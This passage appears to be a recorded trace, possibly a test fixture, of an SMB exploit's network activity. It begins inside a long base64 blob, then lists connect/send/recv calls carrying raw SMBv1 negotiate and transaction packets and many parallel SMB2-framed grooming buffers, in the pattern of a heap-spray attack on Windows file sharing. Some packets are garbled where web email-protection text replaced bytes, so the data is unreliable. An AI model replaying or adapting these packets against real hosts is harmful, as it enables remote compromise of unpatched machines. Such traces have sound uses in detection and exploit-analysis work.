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\\\\x00\\\\x00\\\\x001\\\\xffSMB+\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x01\\\\x01\\\\x00\\\\x0c\\\\x00JlJmIhClBsr\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('connect', 2, 0.0)\", \"('send', 2, b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 2, 0.0)\", \"('send', 2, b'\\\\x00\\\\x00\\\\x00Q\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x0c\\\\xff\\\\x00\\\\x00\\\\x00\\\\x04\\\\x11\\\\n\\\\x00-\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x16\\\\x00\\\\xf0\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 2, 0.0)\", \"('connect', 3, 0.0)\", \"('connect', 4, 0.0)\", \"('send', 3, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 5, 0.0)\", \"('send', 4, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 5, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 6, 0.0)\", \"('send', 6, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 7, 0.0)\", \"('connect', 8, 0.0)\", \"('send', 7, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 8, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 9, 0.0)\", \"('connect', 10, 0.0)\", \"('send', 9, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 10, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 11, 0.0)\", \"('connect', 12, 0.0)\", \"('send', 11, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 13, 0.0)\", \"('send', 12, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 14, 0.0)\", \"('send', 13, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 15, 0.0)\", \"('send', 14, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 16, 0.0)\", \"('send', 15, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 16, b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 